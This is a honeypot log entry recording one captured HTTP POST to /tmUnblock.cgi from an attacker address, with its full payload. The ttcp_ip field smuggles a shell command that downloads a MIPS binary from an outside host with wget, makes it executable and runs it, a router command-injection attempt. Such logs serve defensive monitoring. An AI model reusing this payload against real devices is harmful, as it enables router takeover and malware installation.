Time | 2024/05/07, 00:40:47 (GMT) |
Transaction ID | 99Z29XF7R02PDTGD |
Service | http |
Location | EG (Egypt) |
Attacker | 197.55.101.63 |
Classification | Web post experiment |
Harm Potential | Not |
POST /tmUnblock.cgi HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F45.146.234.130%2Fmipsel%3B+chmod+777+mipsel%3B+.%2Fmipsel+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |